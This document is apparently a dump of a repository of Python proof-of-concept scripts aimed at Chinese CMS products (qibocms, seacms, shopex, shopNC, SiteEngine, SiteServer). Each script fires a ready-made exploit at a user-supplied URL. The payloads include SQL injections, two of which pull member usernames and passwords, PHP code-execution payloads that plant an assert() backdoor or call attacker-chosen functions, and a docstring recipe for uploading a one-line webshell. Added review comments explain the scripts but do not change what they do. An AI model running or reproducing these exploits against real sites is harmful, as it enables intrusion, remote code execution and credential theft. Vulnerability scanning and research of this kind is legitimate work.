        payload = "/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20UnIoN%20SeLeCt%20Md5(1234),2,3,4,5,6,7,8,9%23"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb52d04dc20036dbd8313ed055 == md5("1234").
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在qibocms s.php文件参数fids SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在qibocms_s_fids_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit
            # and reports them as "probably not vulnerable".
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL. All warnings are suppressed
    # (this includes the TLS warning caused by verify=False).
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    qibocms_s_fids_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_search_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibo分类系统search.php 代码执行
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0122599
6 | author: Lucifer
7 | description: search.php代码执行。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class qibocms_search_code_exec_BaseVerify:
    """Two-step probe for the qibo classified-system search.php code execution (module docstring cites WooYun-2015-0122599).

    Step 1 is a GET whose ``title`` parameter carries a template expression;
    step 2 POSTs to /do/jf.php and looks for phpinfo() output. The verdict is
    printed, not returned.
    """

    def __init__(self, url):
        # Base URL; both request paths are appended by string concatenation.
        self.url = url

    def run(self):
        """Plant the expression, trigger it, print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # NOTE(review): the query names an "addjf" action, so step 1 presumably
        # persists the expression on the target (not a read-only probe) —
        # confirm against the referenced advisory before running at scale.
        payload = "/new/fenlei/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${@assert($_POST[vuln])}"
        vulnurl = self.url + payload
        try:
            # Step 1: the response of this GET is never inspected; req is
            # overwritten by the POST below.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Step 2: vulnurl is rebound, so the "[+]" message below reports
            # only the /do/jf.php URL, not the GET that planted the expression.
            vulnurl = self.url + "/do/jf.php"
            post_data = {
                "vuln":"phpinfo();"
            }
            # verify=False on both requests: TLS certificate validation is off.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Marker text taken from phpinfo() output.
            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在qibo分类系统search.php 代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在qibocms_search_code_exec漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit;
            # a failure in step 1 is indistinguishable from one in step 2.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; warnings (including the
    # verify=False TLS warning) are silenced.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    qibocms_search_code_exec_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_search_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms知道系统SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0115138
6 | author: Lucifer
7 | description: 文件/zhidao/zhidao/search.php中,参数fulltext存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class qibocms_search_sqli_BaseVerify:
    """Probe for the qibocms "zhidao" search.php ``fulltext[]`` SQL injection (module docstring cites WooYun-2010-0115138).

    Error-based: the payload uses the COUNT(*)/FLOOR(RAND(0)*2)/GROUP BY
    duplicate-key trick so the database error message carries ``Md5(1234)``.
    Only information_schema is touched. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Pre-URL-encoded literal; the injection point is the fulltext[] array
        # parameter. The check depends on the DB error being echoed to the
        # page, so a site with display_errors off would read as "not vulnerable".
        payload = "/zhidao/zhidao/search.php?&tags=ll%20ll%20ll&keyword=111&fulltext[]=11)%20AnD%201=2%20UnIoN%20SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcAt(FlOoR(RaNd(0)*2),Md5(1234))a%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20a)b%23"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb52d04dc20036dbd8313ed055 == md5("1234").
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在qibocms知道系统注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在qibocms_search_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    qibocms_search_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/seacms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/seacms/__init__.py
--------------------------------------------------------------------------------
/pocs/seacms/seacms_order_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms 6.45 search.php order参数前台代码执行
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件/search.php中,post参数order存在代码执行漏洞。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class seacms_order_code_exec_BaseVerify:
    """Probe for the SeaCMS 6.45 search.php ``order`` template-injection code execution.

    One POST. The injected template fragment calls ``$_POST[func]($_POST[cmd])``
    with func=glob and cmd=comment.php, so a vulnerable host echoes the
    glob() result. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/search.php?searchtype=5"
        # func/cmd are deliberately harmless (glob of a single filename) so
        # the probe does not run a shell command on the target.
        post_data = {
            "searchword":"d",
            "order":"}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}",
            "func":"glob",
            "cmd":"comment.php"
        }
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # NOTE(review): the marker is just the literal "comment.php", which
            # may appear in an ordinary page (links, script tags), so this check
            # is prone to false positives; a less common marker would be safer.
            if r"comment.php" in req.text:
                cprint("[+]存在seacms 6.45 search.php order参数前台代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在seacms_order_code_exec漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
40 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    seacms_order_code_exec_BaseVerify(target).run()
45 |
--------------------------------------------------------------------------------
/pocs/seacms/seacms_search_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms search.php 代码执行
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件search.php中,参数area存在代码执行。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class seacms_search_code_exec_BaseVerify:
    """Probe for the SeaCMS search.php ``area`` parameter code execution.

    One GET with ``area=phpinfo()``; success is the phpinfo() marker text in
    the response. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # For defenders: "phpinfo()" inside a search parameter is a clear
        # request-log signature for this probe.
        payload = "/search.php?searchtype=5&tid=&area=phpinfo()"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Marker text taken from phpinfo() output.
            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在seacms search.php代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在seacms_search_code_exec漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    seacms_search_code_exec_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/seacms/seacms_search_jq_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms search.php 参数jq代码执行
5 | referer: http://www.freebuf.com/vuls/150042.html
6 | author: Lucifer
7 | description: 文件search.php中,传入参数经过拼接造成代码执行。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
class seacms_search_jq_code_exec_BaseVerify:
    """Probe for the SeaCMS search.php template-concatenation code execution via ``jq`` and sibling parameters (module docstring cites the FreeBuf write-up).

    One POST whose form fields are spliced together by the vulnerable
    template into a phpinfo() call; success is the phpinfo() marker text.
    The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; "/search.php" is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            # Body is passed as a pre-encoded string (not a dict), so the
            # form Content-Type has to be set by hand.
            "Content-Type":"application/x-www-form-urlencoded",
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        vulnurl = self.url + "/search.php"
        # Raw, un-escaped form body: braces and brackets are sent verbatim.
        post_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Marker text taken from phpinfo() output.
            if r"Configuration File (php.ini) Path" in req.text:
                # json.dumps on a str just quotes it; indent=4 has no effect here.
                cprint("[+]存在seacms search.php 参数jq代码执行漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
            else:
                cprint("[-]不存在seacms_search_jq_code_exec漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    seacms_search_jq_code_exec_BaseVerify(target).run()
41 |
--------------------------------------------------------------------------------
/pocs/shopex/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/shopex/__init__.py
--------------------------------------------------------------------------------
/pocs/shopex/shopex_phpinfo_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopex敏感信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0100121
6 | author: Lucifer
7 | description: 路径 app/dev/svinfo.php,打开后可看到服务器测评信息及phpinfo等相关敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class shopex_phpinfo_disclosure_BaseVerify:
    """Probe for the ShopEx ``app/dev/svinfo.php`` information disclosure (module docstring cites WooYun-2010-0100121).

    Read-only GET of a developer diagnostics page; success is the phpinfo()
    marker text. Reported as an information-disclosure (green) finding rather
    than a high-risk one. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        }
        # No injection involved: the page itself is the exposure. Mitigation
        # is simply to remove or access-restrict app/dev/ in production.
        payload = "/app/dev/svinfo.php?phpinfo=true"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # Marker text taken from phpinfo() output.
            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在shopex敏感信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
            else:
                cprint("[-]不存在shopex_phpinfo_disclosure漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    shopex_phpinfo_disclosure_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/shopnc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/shopnc/__init__.py
--------------------------------------------------------------------------------
/pocs/shopnc/shopnc_index_class_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopNC B2B版 index.php SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0124172
6 | author: Lucifer
7 | description: 文件index.php中,参数class_id[1]存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class shopnc_index_class_id_sqli_BaseVerify:
    """Probe for the ShopNC B2B microshop index.php ``class_id[1]`` SQL injection (module docstring cites WooYun-2015-0124172).

    Error-based: the payload uses the COUNT(*)/FLOOR(RAND(0)*2)/GROUP BY
    duplicate-key trick so the database error carries ``Md5(1234)``. Only
    information_schema is referenced. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Inline comments (/**/) stand in for spaces; class_id[0]=exp drives
        # the vulnerable code path. Detection relies on the DB error being
        # echoed, so error display off reads as "not vulnerable".
        payload = "/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)And(Select/**/1/**/From(Select/**/Count(*),Concat((Select(Select(Select/**/Concat(0x7e,Md5(1234),0x7e)))From/**/information_schema.tables/**/limit/**/0,1),Floor(Rand(0)*2))x/**/From/**/Information_schema.tables/**/group/**/by/**/x)a)%23"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb52d04dc20036dbd8313ed055 == md5("1234").
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在shopNC B2B版 index.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在shopnc_index_class_id_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    shopnc_index_class_id_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/siteengine/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/siteengine/__init__.py
--------------------------------------------------------------------------------
/pocs/siteengine/siteengine_comments_module_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: SiteEngine 6.0 & 7.1 SQL注入漏洞
5 | referer: http://0day5.com/archives/135
6 | author: Lucifer
7 | description: 文件comments.php中,参数module存在SQL注入,管理后台:http://server/admin/
8 | 系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
9 | 确定—>马上浏览—>看图片属性即为一句话地址。
10 | '''
11 | import sys
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
class siteengine_comments_module_sqli_BaseVerify:
    """Probe for the SiteEngine 6.0 / 7.x comments.php ``module`` SQL injection.

    Up to four GETs with different UNION column counts, each checked for
    ``Md5(1234)`` in the response. Unlike the other pocs, the payloads also
    Group_Concat ``username``/``password`` from boka_members, so a positive
    response body contains account data — do not retain or log it.
    The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; each probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe chain and print colour-coded verdicts (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Probe 1 (26 columns, news module).
        payload = "/comments.php?id=1&module=news+m,boka_newsclass+c+WhErE+1=2+UniOn+sElEct+1,2,Group_Concat(username,0x7e,password,0x7e,Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+From+boka_members%23"
        vulnurl = self.url + payload
        try:
            # verify=False on every request: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb52d04dc20036dbd8313ed055 == md5("1234").
            # NOTE(review): the probes are nested, so probe N+1 only runs when
            # probe N already hit, and the "[-]" line is printed only when the
            # first three hit and the fourth misses. A clean target prints
            # nothing at all — the else belongs on the outermost if (or each
            # probe should be independent).
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在SiteEngine6.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                # Probe 2 (39 columns, newstopic module).
                vulnurl = self.url + "/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+WhEre+1=2+UniOn+sElEct+1,2,Group_Concat(username, 0x7e, password, Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+From+boka_members%23"
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                    # Messages say "7.0" although the module docstring names 7.1.
                    cprint("[+]存在SiteEngine7.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                    # Probe 3 (27 columns).
                    vulnurl = self.url + "/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+WhEre+1=2+UniOn+sElEct+1,2,Group_Concat(username, 0x7e, password, Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+From+boka_members%23"
                    req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                    if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                        cprint("[+]存在SiteEngine7.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                        # Probe 4 (38 columns).
                        vulnurl = self.url + "/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+WhEre+1=2+UniOn+sElEct+1,2,Group_Concat(username, 0x7e, password, Md5(1234), 0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+From+boka_members%23"
                        req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                            cprint("[+]存在SiteEngine7.0 comments.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                        else:
                            cprint("[-]不存在siteengine_comments_module_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit;
            # it also masks which of the four requests failed.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
47 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    siteengine_comments_module_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/siteserver/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/siteserver/__init__.py
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_UserNameCollection_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 user.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043535
6 | author: Lucifer
7 | description: 文件/usercenter/platform/user.aspx中,参数UserNameCollection存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class siteserver_UserNameCollection_sqli_BaseVerify:
    """Probe for the SiteServer 3.6.4 user.aspx ``UserNameCollection`` SQL injection (module docstring cites WooYun-2013-043535).

    Error-based against MSSQL: ``ChAr(66)`` x3 concatenated with ``@@VeRsIon``
    is compared to an integer, and the resulting conversion error message is
    expected to echo "BBBMicrosoft ..." into the page. Nothing beyond the
    server version string is read. The verdict is printed, not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Pre-URL-encoded literal (%27 quote, %2B plus). Detection depends on
        # detailed errors being rendered; customErrors=On would hide them.
        payload = "/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIon>0--"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # "BBB" (three CHAR(66)) immediately followed by the @@version text.
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在siteserver3.6.4 user.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在siteserver_UserNameCollection_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    siteserver_UserNameCollection_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_administrator_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_administrator.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043645
6 | author: Lucifer
7 | description: 文件/siteserver/userRole/background_administrator.aspx中,参数UserNameCollection存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class siteserver_background_administrator_sqli_BaseVerify:
    """Probe for the SiteServer 3.6.4 background_administrator.aspx SQL injection (module docstring cites WooYun-2013-043645).

    Error-based MSSQL check: "BBB" + ``@@VeRsIoN`` compared to an integer so
    the conversion error echoes "BBBMicrosoft ...". The verdict is printed,
    not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # NOTE(review): the injection point here is RoleName, although the
        # module docstring names UserNameCollection — one of the two is stale.
        # The path also lacks the "/siteserver" prefix the docstring mentions.
        payload = "/userRole/background_administrator.aspx?RoleName=%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # "BBB" (three CHAR(66)) followed by the @@version text.
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在siteserver3.6.4 background_administrator.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在siteserver_background_administrator_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: argv[1] is the target base URL; all warnings are suppressed.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    siteserver_background_administrator_sqli_BaseVerify(target).run()
38 |
--------------------------------------------------------------------------------
/pocs/siteserver/siteserver_background_keywordsFilting_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: siteserver3.6.4 background_keywordsFilting.aspx注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2013-043641
6 | author: Lucifer
7 | description: 文件/siteserver/bbs/background_keywordsFilting.aspx中,参数Keyword存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class siteserver_background_keywordsFilting_sqli_BaseVerify:
    """Probe for the SiteServer 3.6.4 background_keywordsFilting.aspx ``keyword`` SQL injection (module docstring cites WooYun-2013-043641).

    Error-based MSSQL check: "BBB" + ``@@VeRsIoN`` compared to an integer so
    the conversion error echoes "BBBMicrosoft ...". The verdict is printed,
    not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Path lacks the "/siteserver" prefix named in the module docstring;
        # the base URL is presumably expected to include it — confirm.
        payload = "/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off.
